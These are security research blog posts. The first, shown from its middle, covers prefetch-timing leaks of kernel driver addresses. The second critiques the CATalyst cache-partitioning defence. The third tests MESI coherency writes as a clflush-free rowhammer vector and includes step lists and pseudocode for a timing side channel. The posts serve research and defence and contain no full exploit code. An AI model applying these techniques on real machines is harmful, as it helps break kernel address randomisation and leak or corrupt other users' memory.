My first idea was to use the prefetch instruction in a modified prime+probe or a evict+time attack. That is make a guess about an address in a driver, then use prefetch instruction to load the cache entry and either evict+time or prime+probe to tell if you actual hit the address. This of cause is pretty slow and there is a lot of memory you’d need to run this on before you’d actually find your way around the kernel address space. I’ll get back to this in another post.

The second idea is what if the prefetch instructions leak information through it’s execution time? I thought of 3 scenarios:

1)      Prefetch does not leak information (e.g. the DS descriptor has a limit, prefetcher doesn’t do anything on kernel memory when called from R0, is designed as  constant time etc.)
2)      Prefetch is slower on virtual addresses which actually maps to a page. One reason could be because telling the prefetcher to load the cache takes time
3)      Prefetch is slower on addresses which is not does not map to a page because searching all page table entries for an address is slower than just searching till you hit something.

Well. First I dug into the descriptor issue mentioned in 1) because that’d be a no go and since I recall that 32bit XP actually has a limit on it’s DS descriptor making it useless to access kernel mode memory. It seems though that this is not the case in 64 bit mode as 5.3.1 of the [1] Intel clearly says that limits are not checked at run time. (I think there are some exceptions for FS/GS) So time to load up a debugger and write some code. First I loaded live KD and dumped a map of the drivers using the “lm n t” command. Then I wrote some user mode code that times the prefetcht2 instruction. I picked the prefetcht2 instruction because I assumed loading the largest latency cache was most likely to be actually carried out by the prefetcher and thus most likely to be successful. I then wrote up code to time prefetching an address 20 times and pick the lowest timing found. My argumentation here is that there is noise in memory sub system (hence the multiple accesses to try and cancel it out) and the lowest value because searching for the lower bound would tell me more than an average. Then I picked two addresses to time in this way. One a few thousand pages below the first loaded driver and one in the first loaded driver. Finally I repeated the experiment a 1000 timers. And voila the prefetcht2 instruction is faster on a virtual address that is actually mapped. I speculate that this is because searching through PTE’s is aborted early and thus faster. I think I know how to figure out if this is true and I may get back to it in another blog post. So I moved on and wrote up a small program that’d scan a small portion of the kernel memory address space and tell me if a page was mapped or not and compared it to my module list. It worked beyond any expectation.

So how fast can I scan? It takes about 112 CLK’s for a miss and 85 CLK’s for hit on my wife’s sandy bridge computer. An approximate value (with 20 timings per address) including code over head is that I run around 500k probes per second. With a 64bit address space that too is impractical to scan the entire address space with. However first we should notice that modern operating systems are paging and thus we only need to probe once per page. A page is usually 4096 bytes large. Also on windows 7 it appears that the 16 upper bits are all set for drivers further reducing the problem. Finally Windows 7 loads drivers continuously – on my computer around 100 mega bytes of them – and thus I only have to run through a 48 bit address space in 100 megabyte steps to find where the drivers are hidden. This reduces the problem to a practical 6 second problem. Now I do get a few false positives on this scan. Other stuff than drivers maybe located in this space and I may have some tuning problems and additional probing could further reduce these. But I consistently find the drivers and only a few false positives.

What was a blessing above – that the drivers are clustered into one big chuck of pages – is a curse going forward. The problem is that we do not get the size of the individual drivers and thus is unable to tell which is which for a gadget search. However I believe we can solve this problem with modified versions of evict+time and prime+probe attacks. This however will have to wait for part 2 of this blog post.

Thanks

I need to express my gratitude to Nishat Herath of Qualys for discussions on this topic I had with him.

Litterature

[1] Intel: “Intel® 64 and IA-32 Architectures Software Developer’s Manual. Volume 3A: System Programming Guide, Part 1”.http://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-vol-3a-part-1-manual.pdf
[2]Intel: “Intel® 64 and IA-32 Architectures.Software Developer’s Manual.Volume 2 (2A, 2B & 2C): Instruction Set Reference, A-Z


Sunday, February 7, 2016

Comments on CATalyst the first use of CAT to mitigate Cache Side Channel Attacks

Recently Lui et al.[1]  released a new very interesting paper. This paper will be the topic of this blog post. In my “Rowbuffer side channel attacks“. I speculated that CAT would be interesting as mitigation for cache side channel attacks. It turns out that I was right about that. I did however get some of the details of how CAT works wrong. Yuval Yarom of University of Adelaide was kind enough to correct me and that became an errata. This new paper, that Yuval co-authored, how ever proves that CAT could indeed play an import role in defending against cache attacks. They call their method “CATalyst”. In this blog post I make an ultra short and incomplete summary of how CAT and CATalyst work for some context. If you wish to get into the details of it you really need to read the paper. Though I will be critical of CATalyst in the this blog post, I should make it  very clear that I consider CATalyst a big step forward towards defense against cache side channel attacks and that I’d much prefer to have CATalyst than nothing at all – which it’s my impression is the current state of cloud computing.

Ultra short summary of how CAT works

Cache allocation technology or CAT is a feature of some newer Xeon’s. It’s not meant to make it into consumer PC’s. Newer means some Haswell’s has CAT, I’m not sure how common it is in Broadwell or Skylake. CAT was meant as a performance enhancement tools to make it allow a supervisor or hypervisor to allocate more L3 cache to performance critical operations. Essentially the hypervisor or supervisor can assign a “Class of service” (Short COS) to an MSR for an application. There are currently 4 COS’s. Each COS is associated with a bitmask that describes which ways of the cache can be evicted under this service class. Thus any application can have reads/writes and flushes served from any way just as before, however only evict ways that is compatible with the COS. The intended effect is to shield high priority applications from competitive eviction by lower priority applications.

Using CAT to defend against CSC

Since flush can be served from any way in the cache as always, CAT is incapable of defending against flush+reload and flush+flush. However those attacks can be thwarted avoiding sharing memory across trust boundaries. [1]Liu et al. uses this to defend against these attacks. 

This makes the most important enemy “Prime + Probe”. Recall prime and probe works by priming a cache set to consist of attacker only data. Then wait for victim activity and finally access the data it had in the cache – if it incurs a cache miss the attacker knows that the victim used the cache set.  With CAT able to prohibit evictions in parts of the cache, it is capable of making it impossible to prime the cache and thus make prime + probe impossible.

However it would be bad karma to just deny eviction as a general rule because that’ll come at a huge performance cost. Deny eviction and the cache cannot adapt to the ongoing work and become inefficient. With 4 COS values it’s however possible to partition the cache in to only 4 pieces. That again is a bad idea, because in the cloud where you typically have say 16 to 64 simultaneous VM’s on one computer.  It could only make it more difficult for the attacker to get co-location by factor 4, but not thwart anything.

 Liu et al.[1] deals with this problem rather elegantly. They divide the cache in two: A secure partition and insecure partition.  Since the secure partition is shared among all VM’s prime + probe would still be possible. To deal with this only so much data can be loaded into the secure partition that absolutely everything can be cached. They then make sure that everything in the secure partition is then cached. The size of the secure partition is kept small to minimize the performance penalty. Finally the VM keeps control of the COS and bitmask to prevent any evictions in the secure partition. Thus everything in the secure partition is pinned in the L3 cache and access to memory in the secure region will never miss the L3 cache. The VMM exports API to the VM’s operating systems to load and unload pages into this secure partition for applications in the VM’s to use. To prevent a DoS attack on this each VM can only load it’s share of secure memory.

Implementation is made possible through the fact that a VMM gets called when MSR’s are written. Thus it can reserve a COS for itself for loading pages into the secure partition and prevent VM’s from gaining this COS as well as setting a bitmask that would allow access to this.
The really cool thing about this is that it’s the first suggested mitigation so far that both looks iron clad and is feasible in current hardware without being tied down to other micro-architectural designs such as the complex-address function for cache allocation and at a reasonable performance cost as well. 

Another feature of CATalyst is that it will make row buffer side channels quite difficult as reads are served entirely from cache, thus not activating a row in D-ram. It might not be all together impossible to use row buffer side channels in this as secure partition may share rows with insecure memory and r/w memory can cause row activation when write operations trigger write-back operations for reasons of cache coherency. I don’t think this is a real problem though.

Problems with this method


I see three problems with this method however:
1)      Modern hardware is required
2)      Changes to VM, OS and applications are required
3)      The secure partition is small.

Modern hardware
The requirement for modern hardware is a short term problem. In time modern hardware will be available in the cloud and thus it’s not really a big issue.

Changes to VMM, OS and applications
For the second problem OS and VMM could probably be easily changed with the current focus on the cloud.  In fact I think the OS changes needed could be implemented by 3rd Party drivers and thus easily made available. Applications pose a much bigger issue though. Typically a cloud consumer uses multiple applications each with their own security requirements and they need to be updated to support CATalyst etc. This problem could be overcome, but certainly a bigger issue than the first. To my knowledge, historically security implementations that require changes to a range of applications have not fared well in the market place.

The small partition size
The real issue for me with CATalyst is the secure partition is small. The obvious maximum size is the cache size of the system to be shared by all VM’s   (say 20 megabytes). That however would be prohibitively expensive performance wise – which is why the authors are talking about taking only a 10th of that effectively limiting the secure partition size to 4-16 pages per VM. Increasing the size is probably associated with (near) exponential performance cost: Caching the most used cache line brings more than caching the 20th most used cache line.

The authors argue that this isn’t a problem: “A few secure pages are usually sufficient
for protecting the security-sensitive code and data since these are usually small”. I beg to differ. For a single crypto implementation this is obviously true. The problem is that many VM’s will have a number of crypto implementations and operation typically threaded.  Remote access technologies may very well use a different implementation than the web shop, that again uses a different one than SSH and so on and so forth. Not to mention custom implementations. But security requirements doesn’t limit themselves to crypto. Oren et al. [2] Showed us that we can infer mouse movement and implement covert channels with cache side channel attacks. Gruss, Spreitzer & Mangaard[3] showed us that we can spy on keyboard input in some circumstances. Why care about crypto if your password leaks? I dare speculate that using machine learning technology combined with cache side channel attacks on the non-secure partition a great many secrets could be leaked from a co-located victim. After all, which information we each consider sensitive is subjective and cache side channel attacks apply to a very wide range of data.

Even if each of these things fit individually in the secure partition bad programming practices, hangs and crashes are likely to, at some point, allow a VM to DOS itself by filling the secure partition and not release appropriately. Not to mention the overhead that would come from often loading pages into secure memory. Further I wouldn’t trust software developers in general to correctly identify security critical code in the first place.

Litterature

[1] Fangfei Liu, Qian Ge, Yuval Yarom, Frank Mckeen, Carlos Rozas, Gernot Heiser, Ruby B. Lee (2016). CATalyst: Defeating Last-Level Cache Side Channel Attacks in Cloud Computing. https://ssrg.nicta.com.au/publications/nictaabstracts/8984.pdf

[2] Oren et al (2015): “Spy in the Sandbox, Practical Cache Attacks in Javascript”; Yossef Oren, P.Kemerlis, Simha Sethumadhavan and Angelos D. Keromytis. arXiv: 1502.07373v2


[3] Gruss, Spreitzer & Mangard (2015): “Cache Template Attacks: Automating Attacks on Inclusive Last-Level Caches”

Monday, February 1, 2016

Row hammer, java script and MESI

Ramblings

There is no tech info here. If you don't care abot my ramblings skip to intro. It's been a while since my last blog post. With 22 blog post of varying quality in my first year of blogging it was time to see to it that I got around to my other hobbies and the usual social commitments around silly season allowed me to enjoy life in other ways. Also I finally got myself a computer and it takes forever installing it. Most of this post was written while installing operating systems on my new computer. So this blog post is likely the last blog post written on my wife's Sandy Bridge. From now on I'm on a cheap Broadwell laptop (that much to my dismay doesn't row hammer either). The good thing is that my new laptop can be crashed and I hope to get back to some of the projects that require kernel mode code real soon. 

Introduction

I was reading around for another blog-post that’ll get around to soon when I stumbled upon an intel document that caught my attention. It hinted at that a read/write pattern could flush the cache and that probably relatively fast.  In other words – row hammer. And it seemed like I could do this project in just a few hours and given how long it had been since I’d posted something I figure I’d do this first and then return to the project I was reading up on. I actually thought that this where going to fail so the working title was “Fail at Row hammer js 2.0”. There is a tendency that people never publish about their failures. But reality of this stuff is that you fail quite frequently (I do at least), but you always learn something in the process and I think it’s a shame that this knowledge generally isn’t shared. I turned out to be wrong about two things – I thought the idea could easily be dismissed, but despite not making the final proof it looks like the idea has merit. The second thing I was wrong about was how long it’d take me to finish. Most of that time was spend fighting Visual Studio. Optimize and it’ll move your instructions around e.g. memory access, then clflush instead of the other way around makes a huge different. Don’t optimize and you’ll have any amount of stack access within your timing section. With just a few hours to spare here and there I were trying again and again to get it to work instead of just go handwritten asm . Something I ended up doing anyway. As usual as the topic is offensive in nature I’ll share source codes only on request.

Why do we need RowHammer.js 2.0?

The short answer is that we don't. The current rowhammer.js works by figuring out which addresses correspond to a cache set and using that information to build a set of addresses that when touched evicts the two addresses required to row hammer. There are currently two ways of doing that. Either by assuming large pages which leaks information about address and cache sets, but an asssumption that is rarely met in the real world or by timing memory access with an accurate timer. However java script is increasingly disbanding access to a timer accurate enough to tell a single cache hit from a cache miss. Java does this to prevent spying using cache side channel attacks, but it has a side effect on row hammer. This makes it difficult to figure out which addresses correspond to a cache set. However not impossible since that, unlike for spying, it's possible to repeat the experiment until enough signal is available to pick it up even with a low accuracy timer. 

Another reasons could be that we might be able to work around the current cache-miss-performance counter detection of row hammer that has been suggest by myself and Nishat Herath of Qualys. Now before you attackers out there start to cheer too much. I'm fairly certain that a new detection and mitigation along these lines is feasible.

The rough overview

Take this scenario: Core 1 and Core 2 are both reading the same cache line. Core 1 doesn't read it much and get it from L3 where as Core 2 reads it a lot and thus retrieves it from L2. At some point Core 1 decides to write to the cache line. Since L2 at Core 2 is disconnected from Core 1 this becomes a coherency problem. The two most likely solutions are these:

1) When writing to a cache line used across multiple caches. Stop all access to this cache line, write back the modified cache to memory, flush the cache hierarchy and "reload" the memory. There is an intel document that can be read as suggesting that this is what happens: "The frequent coordination required between processors when cache lines are marked ‘Invalid’ requires cache lines to be written to memory and subsequently loaded."

2) The second solution is a bit simpler. There is no reason to actually flush the L3 to memory and reload - coherency is guaranteed if L1 and L2 are flushed on all cores since L3 is shared. Thus the scheme could just be: stop all access to the cache line, modify L3. Finally invalidate all lower latency caches (L1 and L2 ) on all cores .

In scenario 1 the possibility of using this to avoid clflush exists and this might give us a way to do row hammer without clflush - potentially even in Javascript. Because this method only requires reading and writing of variables the only micro architectural knowledge we'd actually need would be to figure out if two addresses belong to the same bank and have a thread running on two different cores. [1] Seaborn and Dullien(2015) demonstrated that finding two addresses that belong to the same bank can be done by chance alone. It also seems likely that we could get a thread running on another core. Thus if it'd work we'd eliminate the need for a timer and no special special opcodes would be required. In fact there is a good chance that the method could apply to other devices with similar cache implementations.

The cache coherency protocol

I'll spend a tiny bit of time on the cache coherency protocol of the modern intel CPU's. The protocol insures that multiple caches contains a coherent representation of memory. The protocol is a slightly modified version of the MESI-protocol. The modified protocol is called MESIF, but the literature is much better on MESI if you choose to research this you should start there. The MESIF protocol states that any cache entry is always in one of 5 states: Modified, Exclusive, Shared, Invalid or Forward. The MESI(F) order is not relevant - it just makes the acronym pronounceable. The states are as follows:

Invalid: The cache entry starts out its life as "Invalid". Meaning no meaningful data is stored here. It is also the state that a cache entry enters when we use clflush.

Exclusive: This state means only one cache contains this cache line. Thus in this state there is per definition no cache coherency issues.

Shared: This state means that the cache line is loaded in two or more caches.

Modified: This state signifies that cache line is different in the cache than in main memory - thus that 
a memory store operation is required should this cache become flushed.

Forward: This is a special case of "Shared". It essentially means if multiple caches holds a shared copy of a cache line and that any read operation should be served from here.

The protocol then specifies that for a given cache line, only transistions between these states are possible:

M
E
S
I
F
M
x
x
x
Ok
x
E
x
x
x
Ok
x
S
x
x
Ok
Ok
Ok
I
ok
ok
Ok
Ok
Ok
F
x
x
Ok
Ok
x

Of interest here is that if any cache (say L3) is in the S state, the cache line cannot be directly modified because there is no valid transition to from S to M. It is this feature we hope to utilize.

Another feature of the intel cache manager is snooping. Any memory request is send out on the bus so that every core can report back the state of the cache - that is if and in what state the appropriate cache line is available on the processors caches.

Also I need to mention the Request for Ownership or (RFO for short) transaction. When you're writing to a cache entry that is either shared or invalid you use an RFO. The RFO is an exclusive command - that is no other command executes on the cache hierarchy for the cache line while the RFO is processing. The RFO invalidates all other entries with the cache line in entire cache line loaded in the entire cache hierarchy thus clearing the way for modifying an entry.
We can now outline the two scenarios again.

Core 1 issues a read. The memory is not in the L3 cache which means it'll be loaded into a way in the appropriate cache set : Either there is already an invalid way in the set (one of the ways is marked as I) or an eviction takes place and one of the ways is marked as I. Then data is loaded from main memory and the way is marked as E(xclusive).

Core 2 now reads the same memory. The cache manager decides for some reasons that core 2 needs this cache line a lot of thus wants' to fill L2 with this particular cache line. Consequently it finds an empty way (or makes one through eviction) in appropriate set in L2. Then it loads the data from L3. Now both the L3 and the L2 cache holds a copy (Intel cache is inclusive - what is present in L2 must be in L3 too) and thus both entries now get stamped as S(hared).

Core 1 now places the write operation on the bus. The L3 cache can immediately tell that it's present  and shared. Consequently the L2 must be invalidated. Thus an RFO is send out on the bus and the L2 cache is invalidated. The question here is what happens now.  
Option 1: Modify L3 and set it to Modified.
Option 2: Modify L3, write it back to main memory.  Then set the appropriate entry to Exclusive.
Option 3: Modify L3, write it back to main memory. Invalid date L3. Reload from main memory.

For us to use this method for row hammering we'd need either option 2 or 3 since both read and writing to main memory activates the row either can be used for row hammering. 

Empirical data

Unfortunately grey theory is just that. Intel tweaks around with their processors and details maybe changed for better performance. But we do have the option to see if we can verify it empirically.

 As always when timing things in the memory sub system there is a lot of noise. There are many sources for this noise, but the bottom line is we need to deal with this noise. My rough method has been to sample between 200 and 1000 timings depending on just how much noise I get in my measurements, Then I remove 10% slowest times assuming they were slow due to noise. This is not something that would make my old statistics professors proud, but it’s easy to implement and probably doesn't introduce too much bias anyway. Second we have a ball park idea about how long it’ll take for a given memory operation. Say an uncached memory operation usually takes more than 100 CLK’s on my wife’s Sandy Bridge. Thus if I’m timing uncached operating I assume something went wrong if the time spend was less than 100 CLK’s. This approach  significantly reduce the noise and actually allow me, by looking at the remaining data, to get an idea about what’s happening while I’m writing the code.  Once I’m confident in the code I calculate average and standard deviation and formally test my hypothesis.

So my first step was to get some ball park figures. Because it’s difficult to benchmark how long a an “Uncached” memory write is as it's somewhat undefined, I use the memory read as a proxy for what amount of time it takes to actually access memory.  Cached memory access takes around 66 CLK’s on average. While it’s uncached counterpart (Using CLflush+mfence) to make sure it’s not in cache takes around 200 CLK’s. A Clflush on an address loaded just prior to that takes some 112 CLK’s. Finally I time a write operation (mov [Pointer],1) when I had previously loaded it into L3 and when I hadn’t. Both takes around 90 CLK’s.

These data makes a fair amount of sense. Obviously it’s a lot faster to read from L3 than it is to read from memory. A Clflush operation in essence needs to block the cache line in the hierarchy and then actually invalidate the cache entry and with my fencing we probably need to wait for process to be completed. Consequently we’d expect it to take longer than a cached read, but less than an uncached read that actually has to drop down to memory and fetch stuff.

Now I code up the scenario sketched above.:
1.       Main Thread: Make sure it’s running on core 1. Set affinity and sleep to invoke scheduler
2.       Main Thread: access address of interest (AOI) 6 times which in the past have given me good results on being loaded into L3 and only L3.
3.       Main Thread: Start second thread and wait for it to finish
4.       Second Thread: Make sure it’s running on core 2. As above.
5.       Second thread: access AOI 10000 times to load it into L2
6.       Second thread: Finish
7.       Main Thread: Modify AOI  and time with RDTSC -  mov [AOI],1

And voila: now it mostly takes around 170-210 CLK’s to write memory. This tells me that I’m on to something. It’s much slower than a normal write operation so we can assume that something is going on. It’s also far slower than the clflush from my bench line which should be a flush of a cache entry in the E(xclusive state). In fact the time suggests that we are hitting main memory. That it isn’t always between 170 -210 CLK’s and sometimes far below it seems to suggest that from time to time my address of interest get’s removed from L2 on core 2 before I actually modify it. Maybe the combination of destroying the second thread and waiting for it to be done is enough for other system activity to evict AOI from L2.

But we don’t actually have to live with this circumstantial evidence. We might be able measure if we actually hit memory. It goes like this. When writing to physical memory the row you wish to write in is loaded into the row buffer of the ram. Then it’s modified with the data being written – remember the row buffer is 8kb where as a cache line is only 64 bytes. Finally the row buffer is written into the appropriate row. Consequently if we make sure that another row is in the row buffer by reading it from physical memory before modifying the address of interest we can do a row buffer side channel attack to see if the row was now removed.  

Just prior to modifying I therefore added a function that randomly access physical memory in a large buffer 200 times, thus making it unlikely that the address of interest’s row is in the row buffer. I then modify the address of interest as usual and then access the row of address of interest. To avoid using the cache line for the AOI I make sure to place the AOI on a page boundry and access the memory 2 cache lines further ahead. Thus I have no cache conflicts, but from [5]Seaborn(2015)’s mapping of the physical memory I can be sure to access the same row.

When I read an address from a row, that is in the row buffer as I did for my benchline I get read times of around 200 CLK’s. Interestingly if I immediately access the same row the in the scheme above, it takes around 350 CLK’s for it to finish the request. This seems to indicate that a required resource is unavailable at that time. I have only unfounded speculation what that could be. However if I execute a loop of a significant amount of dummy instructions (mfence) and then access the memory I get times around 208 CLK’s which is consistent with the current row being in the row buffer.  Thus I think I have a strong case that I actually activate the row in D-Ram which is ultimate prerequisit for row hammering.

Can we simplify the attack vector?

If you are smarter than I were you’d probably already know what I’m hinting at. MESI(F) is a protocol to keep coherency between caches – not cores. The core story might just have been a detour in my thinking. What if we load the address of interest into L2 and then modify it on the same core. We’d have exactly the same effect without the threads. At least with a high number of accesses to make sure that the AOI is elevated to L2, this indeed seems to work though the latency on modifying drops from 200 to around 150 CLK's.

Good enough?

I don’t know if we can get this fast enough for actual row hammering. I don’t know how fast we can get two addresses into L2 and then cause them to be written back out again. And since I’m currently without accesses to a computer with ram susceptible to row hammer  I’ll leave it to other people to figure out if it works. Also I’m not really strong in Java script and thus have no clue if the threaded version would really be implementable in JS.  I cannot imagine a world where the non-threaded version isn’t implementable in JS.

Yet another cache side channel attack

Obviously we have another type of cache side channel here. With it taking longer to write to shared memory we know for sure that we can use the method for a side channel attack – thus we can detect if a victim uses a read/write address enough to place them into L1 or L2. For lack of a better name I call it share+modify. There can be many different actual implementations of this cache attacks. This simplest might look like this in pseudo code:

1.mfence
2.StartTime = rdtsc()
3. Modify(address of interest)
4. mfence
5.Information = Rdtsc()-StartTime;
However it's an impractical side channel attack. The reason is that shared memory with read/write access is required. While shared read-only memory is common through dedublication and shared libraries, shared read/write memory is quite scarce. The advantageous thing from an attacker view point is is that it might trigger other performance counters than the classical flush+reload and thus avoid suggested detection for this attack. Might. Also the chances of a victim actually loading stuff into L2 is much lower than L3 and consequently a lot less information is likely to be revealed by this attack.

Litterature

 [1] Mark Seaborn; Thomas Dullien (March 9, 2015). "Exploiting the DRAM rowhammer bug to gain kernel privileges". googleprojectzero.blogspot.com. Google. Retrieved March 10, 2015.
[2] Daniel Gruss, Clémentine Maurice, Stefan Mangard (2015). „Rowhammer.js: A Remote Software-Induced Fault Attack in JavaScript”. http://arxiv.org/abs/1507.06955
[3] David Levinthal(201x). Performance Analysis Guide for Intel® Core™ i7 Processor and Intel® Xeon™ 5500 processors. https://software.intel.com/sites/products/collateral/hpc/vtune/performance_analysis_guide.pdf
[4] Intel (201x).”Avoiding and identifying false sharing among threads”. https://software.intel.com/en-us/articles/avoiding-and-identifying-false-sharing-among-threads
[5]Seaborn(2015):” How physical addresses map to rows and banks in DRAM”;